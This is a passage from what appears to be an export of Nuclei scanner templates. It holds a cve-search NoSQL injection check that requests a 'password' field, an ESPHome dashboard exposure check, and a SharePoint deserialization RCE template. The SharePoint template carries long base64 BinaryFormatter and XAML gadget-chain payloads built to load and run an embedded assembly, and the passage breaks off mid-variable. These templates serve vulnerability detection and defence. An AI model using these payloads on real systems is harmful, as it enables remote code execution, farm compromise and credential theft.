cve-search 4.0-6.0.0 - Unauthenticated NoSQL Injection\n  author: str4k3r\n  severity: critical\n  description: |\n    cve-search versions 4.0 through 6.0.0 expose an unauthenticated DataTables endpoint that accepts attacker-controlled MongoDB collection, projection, filtering, and pagination parameters. This detector uses a harmless invalid projection field against the intended cves collection; version 6.0.1 rejects that field.\n  impact: |\n    An unauthenticated network attacker can read unintended MongoDB data, including administrative usernames and password hashes when local authentication is enabled, by controlling DataTables query parameters.\n  remediation: |\n    Upgrade cve-search to v6.0.1 or later.\n  reference:\n    - https://github.com/cve-search/cve-search/issues/1217\n    - https://github.com/cve-search/cve-search/pull/1218\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-59509\n  classification:\n    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\n    cvss-score: 9.2\n    cve-id: CVE-2026-59509\n    epss-score: 0.01426\n    epss-percentile: 0.71791\n    cwe-id: CWE-20\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: cve-search\n    product: cve-search\n  tags: cve,cve2026,cve-search,mongodb,nosql-injection,unauth\n\nhttp:\n  - raw:\n      - |\n        POST /fetch_cve_data HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        draw=1&start=0&length=1&retrieve=cves&search%5Bvalue%5D=&search%5Bregex%5D=false&columns%5B0%5D%5Bdata%5D=password&columns%5B0%5D%5Bsearchable%5D=true&columns%5B0%5D%5Borderable%5D=false&columns%5B0%5D%5Bsearch%5D%5Bvalue%5D=&columns%5B0%5D%5Bsearch%5D%5Bregex%5D=false\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains_all(body, \"\\\"recordsTotal\\\"\",\"\\\"data\\\"\")'\n          - 'status_code == 200'\n        condition: and\n# digest: 490a0046304402206c2e35488f5b65019bbe3e2cdc0e0fac6d115b8e924edab14d463e4a5d4d54d3022076878e67a56a00907979f270c55ed9efa880f42a4bd9b5758984bbac2fbf4b76:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-59509.yaml","vuln_id":"cve-2026-59509"},{"raw":"id: CVE-2026-59177\n\ninfo:\n  name: ESPHome Device Builder <1.0.10 - Unauthenticated Dashboard Access\n  author: str4k3r\n  severity: high\n  description: |\n    ESPHome Device Builder versions before 1.0.10 bind the trusted Home Assistant ingress site to all interfaces. A client that can reach the ingress port can therefore access the dashboard without the Supervisor's authentication proxy.\n  impact: |\n    An unauthenticated network client may access the Device Builder dashboard and its authenticated capabilities, which can lead to unauthorized access to ESPHome projects and device-management operations.\n  remediation: |\n    Upgrade the ESPHome add-on to a release bundling Device Builder 1.0.10 or later.\n  reference:\n    - https://github.com/esphome/device-builder/security/advisories/GHSA-vv4j-m4vr-f3g6\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-59177\n    - https://github.com/esphome/device-builder/pull/1565\n    - https://github.com/esphome/device-builder/commit/b6387db3f8bf1d3df5771f40e9856b959ae4f6a1\n  classification:\n    cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 8.8\n    cve-id: CVE-2026-59177\n    cwe-id: CWE-306\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: esphome\n    product: device-builder\n    shodan-query: http.title:\"ESPHome Device Builder\"\n  tags: cve,cve2026,esphome,device-builder,auth-bypass,unauth,exposure\n\nhttp:\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers-condition: and\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(body, \"<title>ESPHome Device Builder</title>\")'\n          - 'contains(body, \"<esphome-app\")'\n          - 'status_code == 200'\n        condition: and\n# digest: 4a0a0047304502204922548e6489d5588190a7ecc93b1b9e567a25071bdcc063e8d9438106f2b4cf022100b33e10661e7d87bd24c7c046be01b9e0df5c6a8fa89ba2a18e32e3339d120538:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-59177.yaml","vuln_id":"cve-2026-59177"},{"raw":"id: CVE-2026-58644\n\ninfo:\n  name: Microsoft SharePoint Server - WS-Federation BinaryFormatter Deserialization RCE\n  author: pdteam\n  severity: critical\n  description: |\n    Microsoft SharePoint Server (2016, 2019, Subscription Edition <= 2026.3.1) contains a remote code execution vulnerability in the WS-Federation passive sign-in endpoint (/_trust/default.aspx). The SharePoint authentication module (SPFederationAuthenticationModuleV2) uses a deflate-only DeflateCookieTransform (no MAC/signature check) to decode and BinaryFormatter to deserialize the SecurityContextToken Cookie value in the wresult parameter without type restrictions. An unauthenticated attacker can send a crafted WS-Federation token containing a BinaryFormatter gadget chain (DataSet + LosFormatter + XamlAssemblyLoadFromFile) to execute arbitrary code in the context of the IIS application pool identity (w3wp.exe). The fix (KB5002882, July 2026 CU) replaces the DeflateCookieTransform with\n    NotSupportedCookieTransform, making ReadToken() throw before deserialization.\n  impact: |\n    Unauthenticated attackers can achieve remote code execution as the SharePoint application pool identity (typically a domain service account). This enables full SharePoint farm compromise, machine key extraction for persistent forged authentication tokens, and lateral movement within the domain.\n  remediation: |\n    Apply the July 2026 Cumulative Update (KB5002882 / build 16.0.19725.20434 or later). After patching, rotate farm machine keys using Set-SPMachineKey or Update-SPMachineKey and perform iisreset to revoke any pre-compromise stolen keys. Enable AMSI request-body scanning for /_trust/default.aspx as defense in depth.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-58644\n    - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58644\n    - https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-58644\n    - https://github.com/WismanSec/sharepoint-2026-poc\n    - https://www.rapid7.com/blog/post/etr-cve-2026-58644-microsoft-sharepoint-server-unauthenticated-remote-code-execution-vulnerability-exploited-in-the-wild/\n    - https://documentation.n-able.com/N-central/Release_Notes/GA/Content/N-central_2026.3_HF1_Release_Notes.htm\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-58644\n    cwe-id: CWE-502\n    epss-score: 0.60944\n    epss-percentile: 0.99112\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: microsoft\n    product: sharepoint_server\n    shodan-query: http.component:\"sharepoint\"\n    fofa-query: app=\"Microsoft-SharePoint\"\n  tags: cve,cve2026,sharepoint,rce,deserialization,microsoft,kev,vkev\n\nvariables:\n  dataset_gadget_b64: 'AAEAAAD/////AQAAAAAAAAAMAgAAAE5TeXN0ZW0uRGF0YSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAABNTeXN0ZW0uRGF0YS5EYXRhU2V0AgAAAAlYbWxTY2hlbWELWG1sRGlmZkdyYW0BAQIAAAAGAwAAAKEKPHhzOnNjaGVtYSB4bWxucz0iIiB4bWxuczp4cz0iaHR0cDovL3d3dy53My5vcmcvMjAwMS9YTUxTY2hlbWEiIHhtbG5zOm1zZGF0YT0idXJuOnNjaGVtYXMtbWljcm9zb2Z0LWNvbTp4bWwtbXNkYXRhIiBpZD0ic29tZWRhdGFzZXQiPg0KICAgICAgICAgICAgICAgIDx4czplbGVtZW50IG5hbWU9InNvbWVkYXRhc2V0IiBtc2RhdGE6SXNEYXRhU2V0PSJ0cnVlIiBtc2RhdGE6VXNlQ3VycmVudExvY2FsZT0idHJ1ZSI+DQogICAgICAgICAgICAgICAgICAgIDx4czpjb21wbGV4VHlwZT4NCiAgICAgICAgICAgICAgICAgICAgICAgIDx4czpjaG9pY2UgbWluT2NjdXJzPSIwIiBtYXhPY2N1cnM9InVuYm91bmRlZCI+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgPHhzOmVsZW1lbnQgbmFtZT0iaGVoZSI+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDx4czpjb21wbGV4VHlwZT4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDx4czpzZXF1ZW5jZT4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8eHM6ZWxlbWVudCBuYW1lPSJwd24iIG1zZGF0YTpEYXRhVHlwZT0iU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuTGlzdGAxW1tTeXN0ZW0uRGF0YS5TZXJ2aWNlcy5JbnRlcm5hbC5FeHBhbmRlZFdyYXBwZXJgMltbU3lzdGVtLldlYi5VSS5Mb3NGb3JtYXR0ZXIsIFN5c3RlbS5XZWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iMDNmNWY3ZjExZDUwYTNhXSxbU3lzdGVtLldpbmRvd3MuRGF0YS5PYmplY3REYXRhUHJvdmlkZXIsIFByZXNlbnRhdGlvbkZyYW1ld29yaywgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzVdXSwgU3lzdGVtLkRhdGEuU2VydmljZXMsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0iIHR5cGU9InhzOmFueVR5cGUiIG1pbk9jY3Vycz0iMCIvPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPC94czpzZXF1ZW5jZT4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPC94czpjb21wbGV4VHlwZT4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICA8L3hzOmVsZW1lbnQ+DQogICAgICAgICAgICAgICAgICAgICAgICA8L3hzOmNob2ljZT4NCiAgICAgICAgICAgICAgICAgICAgPC94czpjb21wbGV4VHlwZT4NCiAgICAgICAgICAgICAgICA8L3hzOmVsZW1lbnQ+DQogICAgICAgICAgICA8L3hzOnNjaGVtYT4GBAAAAMtHPGRpZmZncjpkaWZmZ3JhbSB4bWxuczptc2RhdGE9InVybjpzY2hlbWFzLW1pY3Jvc29mdC1jb206eG1sLW1zZGF0YSIgeG1sbnM6ZGlmZmdyPSJ1cm46c2NoZW1hcy1taWNyb3NvZnQtY29tOnhtbC1kaWZmZ3JhbS12MSI+DQogICAgICAgICAgICAgICAgPHNvbWVkYXRhc2V0Pg0KICAgICAgICAgICAgICAgICAgICA8aGVoZSBkaWZmZ3I6aWQ9IlRhYmxlIiBtc2RhdGE6cm93T3JkZXI9IjAiIGRpZmZncjpoYXNDaGFuZ2VzPSJpbnNlcnRlZCI+DQogICAgICAgICAgICAgICAgICAgICAgICA8cHduIHhtbG5zOnhzaT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS9YTUxTY2hlbWEtaW5zdGFuY2UiIHhtbG5zOnhzZD0iaHR0cDovL3d3dy53My5vcmcvMjAwMS9YTUxTY2hlbWEiPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxFeHBhbmRlZFdyYXBwZXJPZkxvc0Zvcm1hdHRlck9iamVjdERhdGFQcm92aWRlciB4bWxuczp4c2k9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hLWluc3RhbmNlIiB4bWxuczp4c2Q9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hIiA+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxFeHBhbmRlZEVsZW1lbnQvPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8UHJvamVjdGVkUHJvcGVydHkwPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPE1ldGhvZE5hbWU+RGVzZXJpYWxpemU8L01ldGhvZE5hbWU+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8TWV0aG9kUGFyYW1ldGVycz4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8YW55VHlwZSB4bWxuczp4c2k9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hLWluc3RhbmNlIiB4bWxuczp4c2Q9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hIiB4c2k6dHlwZT0ieHNkOnN0cmluZyI+SEFYPC9hbnlUeXBlPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9NZXRob2RQYXJhbWV0ZXJzPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPE9iamVjdEluc3RhbmNlIHhzaTp0eXBlPSJMb3NGb3JtYXR0ZXIiPjwvT2JqZWN0SW5zdGFuY2U+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvUHJvamVjdGVkUHJvcGVydHkwPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvRXhwYW5kZWRXcmFwcGVyT2ZMb3NGb3JtYXR0ZXJPYmplY3REYXRhUHJvdmlkZXI+DQogICAgICAgICAgICAgICAgICAgICAgICA8L3B3bj4NCiAgICAgICAgICAgICAgICAgICAgPC9oZWhlPg0KICAgICAgICAgICAgICAgIDwvc29tZWRhdGFzZXQ+DQogICAgICAgICAgICA8L2RpZmZncjpkaWZmZ3JhbT4L'\n\n  internal_gadget_b64: '/wEy1jAAAQAAAP////8BAAAAAAAAAAwCAAAASVN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAAIQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuU29ydGVkU2V0YDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAVDb3VudAhDb21wYXJlcgdWZXJzaW9uBUl0ZW1zAAMABgiNAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkNvbXBhcmlzb25Db21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQgCAAAAAgAAAAkDAAAAAgAAAAkEAAAABAMAAACNAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkNvbXBhcmlzb25Db21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQEAAAALX2NvbXBhcmlzb24DIlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIJBQAAABEEAAAAAgAAAAYGAAAAAAYHAAAAqiA8UmVzb3VyY2VEaWN0aW9uYXJ5CnhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmZ4LzIwMDYveGFtbC9wcmVzZW50YXRpb24iCnhtbG5zOng9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sIgp4bWxuczpzPSJjbHItbmFtZXNwYWNlOlN5c3RlbTthc3NlbWJseT1tc2NvcmxpYiIKeG1sbnM6cj0iY2xyLW5hbWVzcGFjZTpTeXN0ZW0uUmVmbGVjdGlvbjthc3NlbWJseT1tc2NvcmxpYiIKeG1sbnM6aT0iY2xyLW5hbWVzcGFjZTpTeXN0ZW0uSU87YXNzZW1ibHk9bXNjb3JsaWIiCnhtbG5zOmM9ImNsci1uYW1lc3BhY2U6U3lzdGVtLklPLkNvbXByZXNzaW9uO2Fzc2VtYmx5PVN5c3RlbSIKPgogICA8czpBcnJheSB4OktleT0iZGF0YSIgeDpGYWN0b3J5TWV0aG9kPSJzOkNvbnZlcnQuRnJvbUJhc2U2NFN0cmluZyI+CiAgICAgIDx4OkFyZ3VtZW50cz4KICAgICAgICAgPHM6U3RyaW5nPkg0c0lBQUFBQUFBRUFPMVd5MDljVlJqLzNXRm9oNkVRS0xXV3BOYUxVRU45M0F4bDhORVlTeG13WUhqSndORFlKbkJuNWdqWDNMbDNldThkaEM2MExqUTFNV3FpY2VmS1RSZGROS2JHeHNURWhWdVdibHp4QjVqb1ZoZmk3NXg3NXdGTVVqYW1pZUc3Yzc1enpuZSt4Kzg3ejVsNSt3dTBBSWl6N080Q0R4SFNLQjVOdDFrNm4vNnhFdy9hdHZzZWF0UGJmWXZybHErWFBYZk5NMHQ2d1hRY045RHpRdmNxam00NSt2aGNWaSs1UldGMGRDUUhJaC96RThDMDFvTHlxUS9YcTM1M0VPdHIxOXFCWXdnTDZadzAwR3ZBdWxRN0Z1SUc2clVDRlF1YkxSajlTS3JLWDcydVZZcCs2UWVXbzRUdnhwb2t1UXFjT01SY0hDRGlTelIwRSt4UE52U05RR3dHckFmaW9hN0tjMTk4aWxjTnovY0tpTEFSbzBvMHNWZVA0bEhERTdaYmlMQ3VScjVPSE5BYk80QXpXb2hKWmRLS1RRYWQ1b2JRRHBGaU0vbzZOa2pyNUNCaEp0MVd5WmhZMHFPN3N0ZEQ1aDVuOXprQ3liNDVwa1ZSSk15TnRKRXlobFBEUTY5S1NTdHM4ck1jN244ZnVNTjZRTGF6Z1djNWE3N1V1TWY4MHF6N2w3TFlpWVZyMm45MWFXcWM5Wi9zMzVEOU1kdk5SN2dvMHE2ZUF0cGs1Ky96d3pnZDVsaWRkdGsrM3RCdVVWYkpDT0V4WE1BejVEbThSTDVCbnNSZGZFUCtNM2tuL3NKdlNrK0x1UHk2OEtUS1JMYm5kU24vK0V4S2VleEdpamE5a0wwMnhmdndBR2ZKdDFrdW9FTjdGa1BvMVo2SGdYYTJEUFRnRXVLMzk4LzFWMmpZOXlwdXI2b2JaVDNFdDErbU1aY2F2VGJqRml1MmVCMmwwbEJ4Sk8zZk5JcTJqUW1VL0lMcjJWWWUyUzAvRUNYTTVkOFZoUUJHSVhDOVNHWXNWSnpBS2drajQ1YktsaTI4clBBMnJJTHdFUXJNd0hLZEJXR2JtNnJsWHdtNGZ2bEtJQkFaU2pVTzVTM2JDcmJxbzFVazFURExJby9KSUNoblhFZWRtalVSckdRcW5pZWNRTWtYaEYrbWU2RUdhcDNJT09QYU5vSEwrRWEyTEFxV2FWdTNSQkd6Wmtua1RMc2k2Z3JLZmxLWVJlSDU4Tm1la29tVHVxL2hSY3lpZ2dMM3BZQUY3YWtNOThJRXBSZTVmaGN4d3RZSWh2RXl2NVRhQmQ5K3Y1UzYzdmZaNUtmZk9kZG52dno4TFNSK3VIVWoxNXZlK2FSRmh4YlhOUzJSdUg5NTVZUHVYNU9YdURZbnUrTTZUajRoV1crckh0TTZPeE5hZE16UHlRMjBHRHU5N0pubFdkZVoyQ3lJc2tTN3VPNjU3L2t5MXUvOTllWHNyTjZUeldpZ21YQWw0M3JqdGoxaldrNjQ2RUtvTFNCcDl6eDlkVFd6T3FML0kybHFzYytFcitnZXVkeG5xU1p5U2ZMdHVEYktkNlBoL1pxT3lkczVoeXhXMUVsWllHc0tjenhGSzZ4bjhRYmJrbjZLLy9GUHM5Zm1jbFRMZTJ2L3N6eXVJdWRnd3FNZlM1M0pLVGg0QjY0YUgxQldpeHcxS2ZVNWJpS2duc3RlU1Bmajl6VHBJMHU1eHhFZS9TYWU3aWlkVk8xTEl5L25BQzhRa1ZiVEgyZnhlVE5JUCtVOWNYUTFaNGtHM1J5TFIrMjZUb3EzZTczd09rWUg5U1dHUU9rNnhHNXp2a3lVMkFkNWlTOUNrYmRObW41dTBxckk4ZkMwRGlwYzA5UmJVMVlaUmlsalN5RmJ3enFDQ05PNGlqRVh5YTBvUmhXamM2aFlhWlhYUEgyNGxNcWJNVGlRM2Y3Y1hsRTJWNmpoVTdQRTJiU0pUbitrM1JIOWg2U0gvNy8wOU9NR2NrU1BnLzRGQmVCNm53QU9BQUE9PC9zOlN0cmluZz4KICAgICAgPC94OkFyZ3VtZW50cz4KICAgPC9zOkFycmF5PgogICA8aTpNZW1vcnlTdHJlYW0geDpLZXk9ImlucHV0U3RyZWFtIj4KICAgICAgPHg6QXJndW1lbnRzPgogICAgICAgICA8U3RhdGljUmVzb3VyY2UgUmVzb3VyY2VLZXk9ImRhdGEiPjwvU3RhdGljUmVzb3VyY2U+CiAgICAgIDwveDpBcmd1bWVudHM+CiAgIDwvaTpNZW1vcnlTdHJlYW0+CiAgIDxjOkdaaXBTdHJlYW0geDpLZXk9Imd6aXBTdHJlYW0iPgogICAgICA8eDpBcmd1bWVudHM+CiAgICAgICAgICAgIDxTdGF0aWNSZXNvdXJjZSBSZXNvdXJjZUtleT0iaW5wdXRTdHJlYW0iPjwvU3RhdGljUmVzb3VyY2U+CiAgICAgICAgICAgIDxjOkNvbXByZXNzaW9uTW9kZT4wPC9jOkNvbXByZXNzaW9uTW9kZT4KICAgICAgPC94OkFyZ3VtZW50cz4KICAgPC9jOkdaaXBTdHJlYW0+CiAgIDxzOkFycmF5IHg6S2V5PSJidWYiIHg6RmFjdG9yeU1ldGhvZD0iczpBcnJheS5DcmVhdGVJbnN0YW5jZSI+CiAgICAgIDx4OkFyZ3VtZW50cz4KICAgICAgICAgPHg6VHlwZSBUeXBlTmFtZT0iczpCeXRlIi8+CiAgICAgICAgIDx4OkludDMyPjM1ODQ8L3g6SW50MzI+CiAgICAgIDwveDpBcmd1bWVudHM+CiAgIDwvczpBcnJheT4KICAgPE9iamVjdERhdGFQcm92aWRlciB4OktleT0idG1wIiBPYmplY3RJbnN0YW5jZT0ie1N0YXRpY1Jlc291cmNlIGd6aXBTdHJlYW19IiBNZXRob2ROYW1lPSJSZWFkIj4KICAgICAgPE9iamVjdERhdGFQcm92aWRlci5NZXRob2RQYXJhbWV0ZXJzPgogICAgICAgICA8U3RhdGljUmVzb3VyY2UgUmVzb3VyY2VLZXk9ImJ1ZiI+PC9TdGF0aWNSZXNvdXJjZT4KICAgICAgICAgPHg6SW50MzI+MDwveDpJbnQzMj4KICAgICAgICAgPHg6SW50MzI+MzU4NDwveDpJbnQzMj4KICAgICAgPC9PYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4KICAgPC9PYmplY3REYXRhUHJvdmlkZXI+CiAgICA8T2JqZWN0RGF0YVByb3ZpZGVyIHg6S2V5PSJhc21Mb2FkIiBPYmplY3RUeXBlPSJ7eDpUeXBlIHI6QXNzZW1ibHl9IiBNZXRob2ROYW1lPSJMb2FkIj4KICAgICAgICA8T2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnM+CiAgICAgICAgICAgIDxTdGF0aWNSZXNvdXJjZSBSZXNvdXJjZUtleT0iYnVmIj48L1N0YXRpY1Jlc291cmNlPgogICAgICAgIDwvT2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnM+CiAgICA8L09iamVjdERhdGFQcm92aWRlcj4KICAgIDxPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9InR5cGVzIiBPYmplY3RJbnN0YW5jZT0ie1N0YXRpY1Jlc291cmNlIGFzbUxvYWR9IiBNZXRob2ROYW1lPSJHZXRUeXBlcyI+CiAgICAgICAgPE9iamVjdERhdGFQcm92aWRlci5NZXRob2RQYXJhbWV0ZXJzLz4KICAgIDwvT2JqZWN0RGF0YVByb3ZpZGVyPgogICAgPE9iamVjdERhdGFQcm92aWRlciB4OktleT0iZmlyc3RUeXBlIiBPYmplY3RJbnN0YW5jZT0ie1N0YXRpY1Jlc291cmNlIHR5cGVzfSIgTWV0aG9kTmFtZT0iR2V0VmFsdWUiPgogICAgICAgIDxPYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4KICAgICAgICAgICAgPHM6SW50MzI+MDwvczpJbnQzMj4KICAgICAgICA8L09iamVjdERhdGFQcm92aWRlci5NZXRob2RQYXJhbWV0ZXJzPgogICAgPC9PYmplY3REYXRhUHJvdmlkZXI+CiAgICA8T2JqZWN0RGF0YVByb3ZpZGVyIHg6S2V5PSJjcmVhdGVJbnN0YW5jZSIgT2JqZWN0SW5zdGFuY2U9IntTdGF0aWNSZXNvdXJjZSBmaXJzdFR5cGV9IiBNZXRob2ROYW1lPSJJbnZva2VNZW1iZXIiPgogICAgICAgIDxPYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4KICAgICAgICAgICAgPHg6TnVsbC8+CiAgICAgICAgICAgIDxyOkJpbmRpbmdGbGFncz41MTI8L3I6QmluZGluZ0ZsYWdzPgogICAgICAgICAgICA8eDpOdWxsLz4KICAgICAgICAgICAgPHg6TnVsbC8+CiAgICAgICAgICAgIDx4Ok51bGwvPgogICAgICAgICAgICA8eDpOdWxsLz4KICAgICAgICAgICAgPHg6TnVsbC8+CiAgICAgICAgICAgIDx4Ok51bGwvPgogICAgICAgIDwvT2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnM+CiAgICA8L09iamVjdERhdGFQcm92aWRlcj4KPC9SZXNvdXJjZURpY3Rpb25hcnk+BAUAAAAiU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcgMAAAAIRGVsZWdhdGUHbWV0aG9kMAdtZXRob2QxAwMDMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeS9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlci9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkIAAAACQkAAAAJCgAAAAQIAAAAMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQcAAAAEdHlwZQhhc3NlbWJseQZ0YXJnZXQSdGFyZ2V0VHlwZUFzc2VtYmx5DnRhcmdldFR5cGVOYW1lCm1ldGhvZE5hbWUNZGVsZWdhdGVFbnRyeQEBAgEBAQMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BgsAAADIAVN5c3RlbS5GdW5jYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBgwAAABLbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5CgYNAAAAWFByZXNlbnRhdGlvbkZyYW1ld29yaywgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUGDgAAACBTeXN0ZW0uV2luZG93cy5NYXJrdXAuWGFtbFJlYWRlcgYPAAAABVBhcnNlCRAAAAAECQAAAC9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgcAAAAETmFtZQxBc3NlbWJseU5hbWUJQ2xhc3NOYW1lCVNpZ25hdHVyZQpTaWduYXR1cmUyCk1lbWJlclR5cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEBAAMIDVN5c3RlbS5UeXBlW10JDwAAAAkNAAAACQ4AAAAGFAAAACJTeXN0ZW0uT2JqZWN0IFBhcnNlKFN5c3RlbS5TdHJpbmcpBhUAAAAiU3lzdGVtLk9iamVjdCBQYXJzZShTeXN0ZW0uU3RyaW5nKQgAAAAKAQoAAAAJAAAABhYAAAAHQ29tcGFyZQkMAAAABhgAAAANU3lzdGVtLlN0cmluZwYZAAAAK0ludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGGgAAADJTeXN0ZW0uSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKARAAAAAIAAAABhsAAABxU3lzdGVtLkNvbXBhcmlzb25gMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JDAAAAAoJDAAAAAkYAAAACRYAAAAKCw=='\n\n  internal_gadget2_b64: 